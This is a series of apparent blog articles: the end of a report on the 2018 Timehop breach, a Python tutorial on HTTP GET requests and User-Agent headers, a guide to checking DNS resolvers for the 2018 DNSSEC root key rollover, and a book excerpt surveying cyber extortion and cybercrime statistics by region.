Timehop has already acted to make the necessary changes. Certain application features have been temporarily disabled, and users have been logged out of the app. Users will also have to re-authenticate Timehop on their social media accounts. The team has deactivated the keys that allow the app to read and show users' social media posts in their feeds. Timehop explained that the gap between the incident and the public statement was due to the need to make "contact with a large number of partners": the investigation needed to be thorough in order for the response to be clear and coordinated.

How did the Timehop data breach happen?

For transparency, Timehop published a detailed technical report on how it believes the hack happened. An unauthorized user first accessed Timehop's cloud computing environment using an authorized user's credentials. This user then conducted 'reconnaissance activities' once they had created a new administrative account, and logged in to the account on numerous occasions after this in March and June 2018. It was only on July 4 that the attacker attempted to access the production database. Timehop states that the attacker then "conducted a specific action that triggered an alarm", which allowed engineers to act quickly to stop the attack from continuing. Once this was done, there was a detailed and thorough investigation. This included analyzing the attacker's activity on the network and auditing all security permissions and processes.

A measured response to a potential crisis

It's worth noting just how methodical Timehop's response has been. Yes, there will be question marks over the delay, but it does make a lot of sense. Timehop revealed that the news was provided to some journalists "under embargo in order to determine the most effective ways to communicate what had happened while neither causing panic nor resorting to bland euphemism." The incident demonstrates that effective cybersecurity is as much about a robust communication strategy as it is about secure software.

Read next:
Did Facebook just have another security scare?
What security and systems specialists are planning to learn in 2018

Scraping the Web with Python - Quick Start

Packt
17 Feb 2016
9 min read
In this article, we're going to acquire intelligence data from a variety of sources. We might interview people. We might steal files from a secret underground base. We might search the World Wide Web (WWW).

Accessing data from the Internet

The WWW and Internet are based on a series of agreements called Request for Comments (RFC). The RFCs define the standards and protocols to interconnect different networks, that is, the rules for internetworking. The WWW is defined by a subset of these RFCs that specifies the protocols, behaviors of hosts and agents (servers and clients), and file formats, among other details.

In a way, the Internet is a controlled chaos. Most software developers agree to follow the RFCs. Some don't. If their idea is really good, it can catch on, even though it doesn't precisely follow the standards. We often see this in the way some browsers don't work with some websites. This can cause confusion and questions. We'll often have to perform both espionage and plain old debugging to figure out what's available on a given website.

Python provides a variety of modules that implement the software defined in the Internet RFCs. We'll look at some of the common protocols to gather data through the Internet and the Python library modules that implement these protocols.

Background briefing – the TCP/IP protocols

The essential idea behind the WWW is the Internet. The essential idea behind the Internet is the TCP/IP protocol stack. The IP part of this is the internetworking protocol. This defines how messages can be routed between networks. Layered on top of IP is the TCP protocol to connect two applications to each other. TCP connections are often made via a software abstraction called a socket. In addition to TCP, there's also UDP; it's not used as much for the kind of WWW data we're interested in.

In Python, we can use the low-level socket library to work with the TCP protocol, but we won't. A socket is a file-like object that supports open, close, input, and output operations. Our software will be much simpler if we work at a higher level of abstraction. The Python libraries that we'll use will leverage the socket concept under the hood.

The Internet RFCs define a number of protocols that build on TCP/IP sockets. These are more useful definitions of interactions between host computers (servers) and user agents (clients). We'll look at two of these: Hypertext Transfer Protocol (HTTP) and File Transfer Protocol (FTP).

Using http.client for HTTP GET

The essence of web traffic is HTTP. This is built on TCP/IP. HTTP defines two roles: host and user agent, also called server and client, respectively. We'll stick to server and client. HTTP defines a number of kinds of request types, including GET and POST. A web browser is one kind of client software we can use. This software makes GET and POST requests, and displays the results from the web server. We can do this kind of client-side processing in Python using two library modules.

The http.client module allows us to make GET and POST requests as well as PUT and DELETE. We can read the response object. Sometimes, the response is an HTML page. Sometimes, it's a graphic image. There are other things too, but we're mostly interested in text and graphics. Here's a picture of a mysterious device we've been trying to find.
We need to download this image to our computer so that we can see it and send it to our informant, from http://upload.wikimedia.org/wikipedia/commons/7/72/IPhone_Internals.jpg.

Here's a picture of the currency we're supposed to track down and pay with. We need to download this image too. Here is the link: http://upload.wikimedia.org/wikipedia/en/c/c1/1drachmi_1973.jpg

Here's how we can use http.client to get these two image files:

import http.client
import contextlib

path_list = [
    "/wikipedia/commons/7/72/IPhone_Internals.jpg",
    "/wikipedia/en/c/c1/1drachmi_1973.jpg",
]
host = "upload.wikimedia.org"

with contextlib.closing(http.client.HTTPConnection( host )) as connection:
    for path in path_list:
        connection.request( "GET", path )
        response = connection.getresponse()
        print("Status:", response.status)
        print("Headers:", response.getheaders())
        _, _, filename = path.rpartition("/")
        print("Writing:", filename)
        with open(filename, "wb") as image:
            image.write( response.read() )

We're using http.client to handle the client side of the HTTP protocol. We're also using the contextlib module to politely disentangle our application from network resources when we're done using them.

We've assigned a list of paths to the path_list variable. This example introduces list objects without providing any background. It's important that lists are surrounded by [] and the items are separated by ,. Yes, there's an extra , at the end. This is legal in Python.

We created an http.client.HTTPConnection object using the host computer name. This connection object is a little like a file; it entangles Python with operating system resources on our local computer plus a remote server. Unlike a file, an HTTPConnection object isn't a proper context manager. As we really like context managers to release our resources, we made use of the contextlib.closing() function to handle the context management details. The connection needs to be closed; the closing() function assures that this will happen by calling the connection's close() method.

For all of the paths in our path_list, we make an HTTP GET request. This is what browsers do to get the image files mentioned in an HTML page. We print a few things from each response. The status, if everything worked, will be 200. If the status is not 200, then something went wrong and we'll need to read up on the HTTP status code to see what happened. If you use a coffee shop Wi-Fi connection, perhaps you're not logged in. You might need to open a browser to set up a connection.

An HTTP response includes headers that provide some additional details about the request and response. We've printed the headers because they can be helpful in debugging any problems we might have. One of the most useful headers is ('Content-Type', 'image/jpeg'). This confirms that we really did get an image.

We used _, _, filename = path.rpartition("/") to locate the right-most / character in the path. Recall that the partition() method locates the left-most instance. We're using the right-most one here. We assigned the directory information and separator to the variable _. Yes, _ is a legal variable name. It's easy to ignore, which makes it a handy shorthand for "we don't care". We kept the filename in the filename variable.

We create a nested context for the resulting image file. We can then read the body of the response—a collection of bytes—and write these bytes to the image file. In one quick motion, the file is ours.
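One refinement we might add, not present in the original listing, is to check the status and the Content-Type header before writing the body to disk. A sketch of that idea for a single path:

import http.client
import contextlib

host = "upload.wikimedia.org"
path = "/wikipedia/en/c/c1/1drachmi_1973.jpg"

with contextlib.closing(http.client.HTTPConnection(host)) as connection:
    connection.request("GET", path)
    response = connection.getresponse()
    # A 3xx status would carry a Location header we could follow.
    if response.status != 200:
        print("Unexpected status:", response.status, response.reason)
    elif response.getheader("Content-Type") != "image/jpeg":
        print("Not an image:", response.getheader("Content-Type"))
    else:
        _, _, filename = path.rpartition("/")
        with open(filename, "wb") as image:
            image.write(response.read())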
The HTTP GET request is what underlies much of the WWW. Programs such as curl and wget are expansions of this example. They execute batches of GET requests to locate one or more pages of content. They can do quite a bit more, but this is the essence of extracting data from the WWW.

Changing our client information

An HTTP GET request includes several headers in addition to the URL. In the previous example, we simply relied on the Python http.client library to supply a suitable set of default headers. There are several reasons why we might want to supply different or additional headers. First, we might want to tweak the User-Agent header to change the kind of browser that we're claiming to be. We might also need to provide cookies for some kinds of interactions. For information on the user agent string, see http://en.wikipedia.org/wiki/User_agent_string#User_agent_identification. This information may be used by the web server to determine if a mobile device or desktop device is being used.

We can use something like this:

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14

This makes our Python request appear to come from the Safari browser instead of a Python application. We can use something like this to appear to be a different browser on a desktop computer:

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0

We can use something like this to appear to be an iPhone instead of a Python application:

Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53

We make this change by adding headers to the request we're making. The change looks like this:

connection.request( "GET", path,
    headers= {
        'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
    })

This will make the web server treat our Python application like it's on an iPhone. This might lead to a more compact page of data than might be provided to a full desktop computer that makes the same request.

The header information is a structure with the { key: value, } syntax. It's important that dictionaries are surrounded by {}, the keys and values are separated by :, and each key-value pair is separated by ,. Yes, there's an extra , at the end. This is legal in Python.

There are many more HTTP headers we can provide. The User-Agent header is perhaps the most important for gathering different kinds of intelligence data from web servers.
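Putting it together, here is a hypothetical end-to-end check of our own, reusing the drachma image path from earlier, that masquerades as an iPhone and prints what the server sends back:

import http.client
import contextlib

host = "upload.wikimedia.org"
path = "/wikipedia/en/c/c1/1drachmi_1973.jpg"
iphone_ua = ("Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) "
             "AppleWebKit/537.51.2 (KHTML, like Gecko) "
             "Version/7.0 Mobile/11D201 Safari/9537.53")

with contextlib.closing(http.client.HTTPConnection(host)) as connection:
    # Only the headers argument differs from the earlier plain GET.
    connection.request("GET", path, headers={"User-Agent": iphone_ua})
    response = connection.getresponse()
    print("Status:", response.status)
    print("Content-Type:", response.getheader("Content-Type"))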

RedHat shares what to expect from next week’s first-ever DNSSEC root key rollover

Melisha Dsouza
05 Oct 2018
4 min read
On Thursday, October 11, 2018, at 16:00 UTC, ICANN will change the cryptographic key that is at the center of the DNS security system, what is called DNSSEC. The current key has been in place since July 15, 2010. This switching of the central security key for DNS is called the "Root Key Signing Key (KSK) Rollover".

The replacement was originally planned a year back, but the procedure was postponed because of data that suggested a significant number of resolvers were not ready for the rollover. However, the question is: are your systems prepared so that DNS will keep functioning for your networks?

DNSSEC is a system of digital signatures to prevent DNS spoofing. Maintaining an up-to-date KSK is essential to ensuring that DNSSEC-validating DNS resolvers continue to function following the rollover. If the KSK isn't up to date, DNSSEC-validating DNS resolvers will be unable to resolve any DNS queries.

If the switch happens smoothly, users will not notice any visible changes and their systems will work as usual. However, if their DNS resolvers are not ready to use the new key, users may not be able to reach many websites! That being said, there's good news for those who have been keeping up with recent DNS updates. Since this rollover was delayed for almost a year, most DNS resolver software has been shipping with the new key for quite some time. Users who are up to date will have their systems all set for this change. If not, we've got you covered! But first, let's do a quick background check.

As of today, the root zone is still signed by the old KSK with the ID 19036, also called KSK-2010. The new KSK, with the ID 20326, was published in the DNS in July 2017 and is called KSK-2017. KSK-2010 is currently used to sign itself, to sign the Root Zone Signing Key (ZSK), and to sign the new KSK-2017. The rollover only affects the KSK; the ZSK gets updated and replaced more frequently without the need to update the trust anchor inside the resolver.

Source: Suse.com

You can go ahead and watch ICANN's short video to understand all about the switch. Now that you have understood all about the switch, let's go through all the checks you need to perform.

#1 Check if you have the new DNSSEC Root Key installed

Users need to ensure that the new DNSSEC root key (KSK-2017), which has key ID 20326, is installed. To check this, look at the following locations:

- bind - see /etc/named.root.key
- unbound / libunbound - see /var/lib/unbound/root.key
- dnsmasq - see /usr/share/dnsmasq/trust-anchors.conf
- knot-resolver - see /etc/knot-resolver/root.keys

There is no need to restart the DNS service unless the server has been running for more than a year and does not support RFC 5011.

#2 A backup plan in case of unexpected problems

The RedHat team assures users that DNS issues are very unlikely. In case users do encounter a problem, they are advised to restart their DNS server. They can also try a dig +dnssec dnskey query. If all else fails, they should temporarily switch to a public DNS operator.
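As one concrete illustration of ours, not a command from the article, asking for the root DNSKEY RRset with multiline comments makes the key tags visible:

dig . dnskey +multiline

In the comments dig adds to each DNSKEY record, the new KSK should appear with key id = 20326.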
#3 Check for an incomplete RFC 5011 process

When the switch happens, containers or virtual machines that have old configuration files and new software would only have the soon-to-be-removed DNSSEC root key. This is logged via RFC 8145 to the root name servers, which provides ICANN with the statistics above. The server then updates the key via RFC 5011, but there is a possibility that it shuts down before the 30-day hold timer has been reached. It can also happen that the hold timer is reached but the configuration file cannot be written to, or that the file is written but the image is destroyed on shutdown or reboot, and the container restarts without the new key.

RedHat believes the switch of this cryptographic key will lead to an improved level of security and trust that users can have online! To know more about this rollover, head to RedHat's official blog.

What Google, RedHat, Oracle, and others announced at KubeCon + CloudNativeCon 2018
Google, IBM, RedHat and others launch Istio 1.0 service mesh for microservices
Red Hat infrastructure migration solution for proprietary and siloed infrastructure

Introduction to Cyber Extortion

Packt
19 Jun 2017
21 min read
In this article by Dhanya Thakkar, the author of the book Preventing Digital Extortion, we see how often we make the mistake of relying on the past to predict the future, and nowhere is this more relevant than in the sphere of the Internet and smart technology. People, processes, data, and things are tightly and increasingly connected, creating new, intelligent networks unlike anything we have seen before. The growth is exponential and the consequences are far-reaching for individuals, and progressively so for businesses. We are creating the Internet of Things and the Internet of Everything.

It has become unimaginable to run a business without using the Internet. It is not only an essential tool for current products and services, but an unfathomable well for innovation and fresh commercial breakthroughs. The transformative revolution is spilling into the public sector, affecting companies like vanguards and diffusing to consumers, who are in a feedback loop with suppliers, constantly obtaining and demanding new goods. Advanced technologies that apply not only to machine-to-machine communication but also to smart sensors generate complex networks to which, theoretically, anything that can carry a sensor can be connected. Cloud computing and cloud-based applications provide immense yet affordable storage capacity for people and organizations, and facilitate the spread of data in more ways than one. Keeping in mind the Internet's nature, the physical boundaries of business become blurred, and virtual data protection must incorporate a new characteristic of security: encryption.

In the middle of the storm of the IoT, major opportunities arise, and equally so, unprecedented risks lurk. People often think that what they put on the Internet is protected and closed information. It is hardly so. Sending an e-mail is not like sending a letter in a closed envelope. It is more like sending a postcard, where anyone who gets their hands on it can read what's written on it. Along with people who want to utilize the Internet as an open business platform, there are people who want to find ways of circumventing legal practices and misusing the wealth of data on computer networks by unlawfully gaining financial profits, assets, or authority that can be monetized. Being connected is now critical. As cyberspace is growing, so are attempts to violate vulnerable information gaining global scale. This newly discovered business dynamic is under persistent threat of criminals. Cyberspace, cybercrime, and cybersecurity are perceptibly being found in the same sentence.

Cybercrime – underdefined and underregulated

A massive problem encouraging the perseverance and evolution of cybercrime is the lack of an adequate unanimous definition and the underregulation of the phenomenon on a national, regional, and global level. Nothing is criminal unless stipulated by the law. Global law enforcement agencies, academia, and state policies have studied the constant development of the phenomenon since its first appearance in 1989, in the shape of the AIDS Trojan virus transferred from an infected floppy disk. Regardless of the bizarre beginnings, there is nothing entertaining about cybercrime. It is serious. It is dangerous. Significant efforts are made to define cybercrime on a conceptual level in academic research and in national and regional cybersecurity strategies. Still, as the nature of the phenomenon evolves, so must the definition.
Research reports are still at a descriptive level, and underreporting is a major issue. On the other hand, businesses are more exposed due to ignorance of the fact that modern-day criminals increasingly rely on the Internet to enhance their criminal operations. Case in point: Aaushi Shah and Srinidhi Ravi from the Asian School of Cyber Laws have created a cybercrime list by compiling a set of 74 distinctive and creatively named actions emerging in the last three decades that can be interpreted as cybercrime. These actions target anything from e-mails to smartphones, personal computers, and business intranets: piggybacking, joe jobs, and easter eggs may sound like cartoons, but their true nature resembles a crime thriller.

The concept of cybercrime

Cyberspace is a giant community made out of connected computer users and data on a global level. As a concept, cybercrime involves any criminal act dealing with computers and networks, including traditional crimes in which the illegal activities are committed through the use of a computer and the Internet. As businesses become more open and widespread, the boundary between data freedom and restriction becomes more porous. Countless e-shopping transactions are made, hospitals keep records of patient histories, students pass exams, and around-the-clock payments are increasingly processed online. It is no wonder that criminals are relentlessly invading cyberspace, trying to find a crack to slip through. There are no recognizable border controls on the Internet, but a business that wants to evade harm needs to understand cybercrime's nature and apply means to restrict access to certain information.

Instead of identifying it as a single phenomenon, Majid Yar proposes a common denominator approach for all ICT-related criminal activities. In his book Cybercrime and Society, Yar refers to Thomas and Loader's working concept of cybercrime as follows:

"Computer-mediated activities which are either illegal or considered illicit by certain parties and which can be conducted through global electronic network."

Yar elaborates on the important distinction in this definition by emphasizing the difference between crime and deviance. Criminal activities are explicitly prohibited by formal regulations and bear sanctions, while deviances breach informal social norms. This is a key note to keep in mind. It encompasses the evolving definition of cybercrime, which keeps transforming to keep pace with resourceful criminals who constantly think of new ways to gain illegal advantages.

Law enforcement agencies on a global level make an essential distinction between two subcategories of cybercrime:

- Advanced cybercrime or high-tech crime
- Cyber-enabled crime

The first subcategory, according to Interpol, includes newly emerged sophisticated attacks against computer hardware and software. On the other hand, the second category contains traditional crimes in modern clothes, for example, crimes against children, such as exposing children to illegal content; financial crimes, such as payment card frauds, money laundering, and counterfeiting currency and security documents; social engineering frauds; and even terrorism.

We are far beyond the limited impact of the 1989 cybercrime embryo. Intricate networks are created daily. They present new criminal opportunities, causing greater damage to businesses and individuals, and require a global response.
Cybercrime is conceptualized as a service embracing a commercial component. Cybercriminals work as businessmen who look to sell a product or a service to the highest bidder.

Critical attributes of cybercrime

An abridged version of the cybercrime concept provides answers to three vital questions:

- Where are criminal activities committed and what technologies are used?
- What is the reason behind the violation?
- Who is the perpetrator of the activities?

Where and how – realm

Cybercrime can be an online, digitally committed, traditional offense. Even if the component of an online, digital, or virtual existence were not included in its nature, it would still have been considered crime in the traditional, real-world sense of the word. In this sense, as the nature of cybercrime advances, so must the spearheads of law enforcement rely on laws written for the non-digital world to solve problems encountered online. Otherwise, the combat becomes stagnant and futile.

Why – motivation

The prefix "cyber" sometimes creates additional misperception when applied to the digital world. It is critical to differentiate cybercrime from other malevolent acts in the digital world by considering the reasoning behind the action. This is not only imperative for clarification purposes, but also for extending the definition of cybercrime over time to include previously indeterminate activities. Offenders commit a wide range of dishonest acts for selfish motives such as monetary gain, popularity, or gratification. When the intent behind the behavior is misinterpreted, confusion may arise, and actions that should not have been classified as cybercrime could be charged with criminal prosecution.

Who – the criminal deed component

The action must be attributed to a perpetrator. Depending on the source, certain threats can be translated to the criminal domain only or expanded to endanger potentially larger targets, representing an attack on national security or a terrorist attack. Undoubtedly, the concept of cybercrime needs additional refinement, and a comprehensive global definition is in progress. Along with global cybercrime initiatives, national regulators are continually working on implementing laws, policies, and strategies to exemplify cybercrime behaviors and thus strengthen combating efforts.

Types of common cyber threats

In their endeavors to raise cybercrime awareness, the United Kingdom's National Crime Agency (NCA) divided common and popular cybercrime activities by affiliating them with the target under threat. While both individuals and organizations are targets of cybercriminals, it is the business-consumer networks that suffer irreparable damages due to the magnitude of harmful actions.

Cybercrime targeting consumers:

- Phishing: illegitimate e-mails are sent to the receiver to collect security information and personal details
- Webcam manager: a gross violation in which criminals take over a person's webcam
- File hijacker: criminals hijack files and hold them "hostage" until the victim pays the demanded ransom
- Keylogging: criminals record the text behind the keys you press on your keyboard
- Screenshot manager: enables criminals to take screenshots of an individual's computer screen
- Ad clicker: annoying but dangerous ad clickers direct a victim's computer to click on a specific harmful link

Cybercrime targeting businesses:

Hacking

Hacking is basically unauthorized access to computer data.
Hackers inject specialist software with which they try to take administrative control of a computerized network or system. If the attack is successful, the stolen data can be sold on the dark web, compromising people's integrity and safety by intruding on and abusing the privacy of products as well as sensitive personal and business information. Hacking is particularly dangerous when it compromises the operation of systems that manage physical infrastructure, for example, public transportation.

Distributed denial of service (DDoS) attacks

When an online service is targeted by a DDoS attack, the communication links overflow with data from messages sent simultaneously by botnets. Botnets are collections of controlled computers that block legitimate access to online services for users. The system is unable to provide normal access, as it cannot handle the huge volume of incoming traffic.

Cybercrime in relation to overall computer crime

Many moons have passed since 2001, when the first international treaty that targeted Internet and computer crime—the Budapest Convention on Cybercrime—was adopted. The Convention's intention was to harmonize national laws, improve investigative techniques, and increase cooperation among nations. It was drafted with the active participation of the Council of Europe's observer states Canada, Japan, South Africa, and the United States, and drawn up by the Council of Europe in Strasbourg, France. Brazil and Russia, on the other hand, refused to sign the document on the basis of not being involved in the Convention's preparation.

In Understanding Cybercrime: A Guide to Developing Countries (Gercke, 2011), Marco Gercke makes an excellent final point:

"Not all computer-related crimes come under the scope of cybercrime. Cybercrime is a narrower notion than all computer-related crime because it has to include a computer network. On the other hand, computer-related crime in general can also affect stand-alone computer systems."

Although progress has been made, consensus over the definition of cybercrime is not final. Keeping history in mind, a fluid and developing approach must be taken when applying working and legal interpretations. In the end, international noncompliance must be overcome to establish a common and safe ground on which to tackle persistent threats.

Cybercrime localized – what is the risk in your region?

Europol's heat map for the period between 2014 and 2015 reports on the geographical distribution of cybercrime on the basis of the United Nations geoscheme. The data in the report encompassed cyber-dependent crime and cyber-enabled fraud, but it did not include investigations into online child sexual abuse.

North and South America

Due to its overwhelming presence, it is not a great surprise that the North American region occupies several lead positions concerning cybercrime, both in terms of enabling malicious content and in providing residency to the victims who make up the global cybercrime numbers. The United States hosted between 20% and nearly 40% of the world's command-and-control servers during 2014. Additionally, the US currently hosts over 45% of the world's phishing domains and is in the pack of world-leading spam producers. Between 16% and 20% of all global bots are located in the United States, while almost a third of point-of-sale malware and over 40% of all ransomware incidents were detected there.
Twenty EU member states have initiated criminal procedures in which the parties under suspicion were located in the United States. In addition, over 70 percent of the countries located in the Single Euro Payments Area (SEPA) have been subject to losses from skimmed payment cards because of the distinct way in which the US, under certain circumstances, processes card payments without chip-and-PIN technology.

There are instances of cybercrime in South America, but the scope of participation by the southern continent is far smaller than that of its northern neighbor, both in industry reporting and in criminal investigations. Ecuador, Guatemala, Bolivia, Peru, and Brazil are constantly rated high on the malware infection scale, and the situation is not changing, while Argentina and Colombia remain among the top 10 spammer countries. Brazil has a critical role in point-of-sale malware, ATM malware, and skimming devices.

Europe

The key aspect making Europe a region with excellent cybercrime potential is its fast, modern, and reliable ICT infrastructure. According to The Internet Organised Crime Threat Assessment (IOCTA) 2015, cybercriminals abuse Western European countries to host malicious content and launch attacks inside and outside the continent. EU countries host approximately 13 percent of the global malicious URLs, of which the Netherlands is the leading country, while Germany, the U.K., and Portugal come second, third, and fourth respectively. Germany, the U.K., the Netherlands, France, and Russia are important hosts for bot C&C infrastructure and phishing domains, while Italy, Germany, the Netherlands, Russia, and Spain are among the top sources of global spam. Scandinavian countries and Finland are famous for having the lowest malware infection rates. France, Germany, Italy, and to some extent the U.K. have the highest malware infection rates and the highest proportion of bots found within the EU. However, these findings are presumably the result of the high populations of the aforementioned EU countries.

Half of the EU member states identified criminal infrastructure or suspects in the Netherlands, Germany, Russia, or the United Kingdom. One third of the European law enforcement agencies confirmed connections to Austria, Belgium, Bulgaria, the Czech Republic, France, Hungary, Italy, Latvia, Poland, Romania, Spain, or Ukraine.

Asia

China is the United States' counterpart in Asia in terms of the top position concerning reported threats to Internet security. Fifty percent of the EU member states' investigations on cybercrime include offenders based in China. Moreover, certain authorities quote China as the source of one third of all global network attacks. In the company of India and South Korea, China is third among the top-10 countries hosting botnet C&C infrastructure, and it has one of the highest global malware infection rates. India, Indonesia, Malaysia, Taiwan, and Japan host serious bot numbers, too.

Japan plays a significant part both as a source country and as a victim of cybercrime. Apart from being an abundant spam source, Japan is included in the top three Asian countries where EU law enforcement agencies have identified cybercriminals. On the other hand, Japan, along with South Korea and the Philippines, is the most popular country in the East and Southeast region of Asia where organized crime groups run sextortion campaigns. Vietnam, India, and China are the top Asian countries featuring spamming sources.
Meanwhile, China and Hong Kong are the most prominent locations for hosting phishing domains, and the country code top-level domains (ccTLDs) for Thailand and Pakistan are commonly used in phishing attacks. Most SEPA members reported losses from the use of cards skimmed in this region; in fact, five of the top six countries (Indonesia, the Philippines, South Korea, Vietnam, and Malaysia) are located here.

Africa
Africa remains known for blended and sophisticated cybercrime practices. Data from the Europol heat map report indicates that the African region holds a ransomware-as-a-service presence equivalent to that of the European black market, with cybercriminals from Africa profiting from the same products. Nigeria is on the top-10 list, compiled by EU law enforcement, of countries featuring identified cybercrime perpetrators and related infrastructure. In addition, four of the top five top-level domains used for phishing are of African origin: .cf, .za, .ga, and .ml.

Australia and Oceania
The region has two critical cybercrime claims at a global level. First, Australia is present in several top-10 charts in the cybersecurity industry, including bot populations, ransomware detections, and network attack originators. Second, the country code top-level domain for Palau in Micronesia is massively used by Chinese attackers and has the second highest proportion of domains used for phishing.

Cybercrime in numbers
Experts agree that the past couple of years have seen digital extortion flourish. In 2015 and 2016, cybercrime reached epic proportions. Although there is agreement about the serious rise of the threat, putting each ransomware aspect into numbers is a complex issue. Underreporting is an issue not only in academic research but also in practical case scenarios. The threat to businesses around the world is growing, yet businesses keep quiet about it. The scope of extortion is obscured because companies avoid reporting and pay the ransom in order to settle the issue discreetly. What goes for corporations is even more relevant for public enterprises or organizations that provide a public service of any kind. Government bodies, hospitals, transportation companies, and educational institutions are increasingly targeted with digital extortion. Cybercriminals estimate that these targets are likely to pay in order to protect their reputation and to ensure the uninterrupted delivery of public services.

When CEOs and CIOs keep their mouths shut, relying on reported cybercrime numbers can be tricky. The real picture is not only what is visible in the media or via professional networking, but also what remains hidden and is dealt with discreetly by security experts. In the second quarter of 2015, Intel Security reported a 58% increase in ransomware attacks. In just the first 3 months of 2016, cybercriminals amassed $209 million from digital extortion. By making businesses and authorities pay the relatively small average ransom amount of $10,000 per incident, extortionists turn out to make smart business moves. Companies are not shaken to the core by this amount; furthermore, they choose to pay and get back to business as usual, thus eliminating the further financial damage that may arise from being out of business and losing customers. Extortionists understand the nature of ransom payment and what it means for businesses and institutions. As sound entrepreneurs, they know their market.
Instead of setting unreasonably high prices that might cause major panic and draw severe law enforcement action, they keep a low profile. In this way, they keep the dark business flowing, moving from one victim to the next while evading legal measures.

A peculiar perspective – Cybercrime in absolute and normalized numbers
"To get an accurate picture of the security of cyberspace, cybercrime statistics need to be expressed as a proportion of the growing size of the Internet similar to the routine practice of expressing crime as a proportion of a population, i.e., 15 murders per 1,000 people per year."

This statement by Eric Jardine of the Global Commission on Internet Governance (Jardine, 2015) introduced a new perspective on cybercrime statistics, one that accounts for the changing nature and size of cyberspace. The approach assumes that viewing cybercrime findings in isolation from the rest of the changes in cyberspace provides a distorted view of reality. The report aimed to normalize crime statistics and thus avoid the overly negative cybercrime scenarios that emerge when conclusions are drawn from absolute numbers of limited reliability. In general, there are three ways in which absolute numbers can be misinterpreted:

- Absolute numbers can negatively distort the real picture, while normalized numbers show whether the situation is actually getting better
- Both sets of numbers can show that things are getting better, but normalized numbers will show that the situation is improving more quickly
- Both sets of numbers can indicate that things are deteriorating, but normalized numbers will indicate that the situation is deteriorating at a slower rate than absolute numbers suggest
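To make the first of these cases concrete, consider a toy calculation. All numbers below are hypothetical, invented purely for illustration: the absolute incident count grows every year, yet the rate per million websites falls.

#!/usr/bin/python
# Toy illustration with hypothetical numbers: incidents rise in absolute
# terms, but fall once normalized by the size of cyberspace.
years = [2012, 2013, 2014]
incidents = [500000, 550000, 590000]   # hypothetical absolute incident counts
websites = [634e6, 766e6, 968e6]       # hypothetical size-of-cyberspace proxy

for year, count, size in zip(years, incidents, websites):
    rate = count / size * 1e6          # incidents per million websites
    print "%d: absolute=%d, per million websites=%.1f" % (year, count, rate)

Run as written, the absolute column climbs from 500,000 to 590,000 while the normalized rate drops from roughly 789 to 610 incidents per million websites, which is exactly the first misinterpretation listed above.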
Additionally, the GCIG (Global Commission on Internet Governance) report includes some excellent reasoning about the nature of empirical research undertaken in the age of the Internet. While almost everyone and everything is connected to the network and data can be easily collected, most of the information is fragmented across numerous private parties. This naturally muddies the clarity of findings about the presence of cybercrime in the digital world. When data is borrowed from multiple sources and missing slots are filled with hypothetical numbers, the end result can be skewed. Keeping this observation in mind, it is crucial to emphasize that the GCIG report measured the size of cyberspace by accounting for eight key aspects:

- The number of active mobile broadband subscriptions
- The number of smartphones sold to end users
- The number of domains and websites
- The volume of total data flow
- The volume of mobile data flow
- The annual number of Google searches
- The Internet's contribution to GDP

It has been illustrated several times during this introduction that as cyberspace grows, so does cybercrime. To fight the menace, businesses and individuals enhance security measures and put more money into their security budgets. A recent CIGI-Ipsos (Centre for International Governance Innovation - Ipsos) survey collected data from 23,376 Internet users in 24 countries, including Australia, Brazil, Canada, China, Egypt, France, Germany, Great Britain, Hong Kong, India, Indonesia, Italy, Japan, Kenya, Mexico, Nigeria, Pakistan, Poland, South Africa, South Korea, Sweden, Tunisia, Turkey, and the United States. Survey results showed that 64% of users were more concerned about their online privacy than in the previous year, whereas 78% were concerned about having their banking credentials hacked. Additionally, 77% of users were worried about cybercriminals stealing private images and messages. These perceptions led to behavioral changes: 43% of users started avoiding certain sites and applications, some 39% regularly updated their passwords, while about 10% used the Internet less (CIGI-Ipsos, 2014).

The GCIG report results are indicative of a heterogeneous cybersecurity picture. Although many cybersecurity aspects are deteriorating over time, some are staying constant, and a surprising number are actually improving. Jardine compares cyberspace security to trends in crime rates in a specific country, operationalizing cyber attacks via 13 measures presented in the following table, as seen in Table 2 of Summary Statistics for the Security of Cyberspace (E. Jardine, GCIG Report, p. 6):

| Measure | Minimum | Maximum | Mean | Standard Deviation |
| --- | --- | --- | --- | --- |
| New Vulnerabilities | 4,814 | 6,787 | 5,749 | 781.880 |
| Malicious Web Domains | 29,927 | 74,000 | 53,317 | 13,769.99 |
| Zero-day Vulnerabilities | 8 | 24 | 14.85714 | 6.336 |
| New Browser Vulnerabilities | 232 | 891 | 513 | 240.570 |
| Mobile Vulnerabilities | 115 | 416 | 217.35 | 120.85 |
| Botnets | 1,900,000 | 9,437,536 | 4,485,843 | 2,724,254 |
| Web-based Attacks | 23,680,646 | 1,432,660,467 | 907,597,833 | 702,817,362 |
| Average per Capita Cost | 188 | 214 | 202.5 | 8.893818078 |
| Organizational Cost | 5,403,644 | 7,240,000 | 6,233,941 | 753,057 |
| Detection and Escalation Costs | 264,280 | 455,304 | 372,272 | 83,331 |
| Response Costs | 1,294,702 | 1,738,761 | 1,511,804 | 152,502.2526 |
| Lost Business Costs | 3,010,000 | 4,592,214 | 3,827,732 | 782,084 |
| Victim Notification Costs | 497,758 | 565,020 | 565,020 | 30,342 |

While reading the table results, an essential argument must be kept in mind. Statistics for cybercrime costs are not available worldwide. The author worked with the assumption that data about US costs of cybercrime indicates costs on a global level. For obvious reasons, however, this assumption may not be true, and many countries will have had significantly lower costs than the US. To mitigate the assumption's flaws, the author provides comparative levels of those measures. The organizational cost of data breaches in the United States in 2013 was a little less than six million US dollars, while the global average, drawn from the Ponemon Institute's annual Cost of Data Breach Study (2011, 2013, and 2014, via Jardine, p. 7), which measured the overall cost of data breaches including the US ones, was US$2,282,095. The conclusion is that the US numbers inflate the global cost findings, which works against the paper's suggestion that normalized numbers paint a rosier picture than absolute numbers do.

Summary
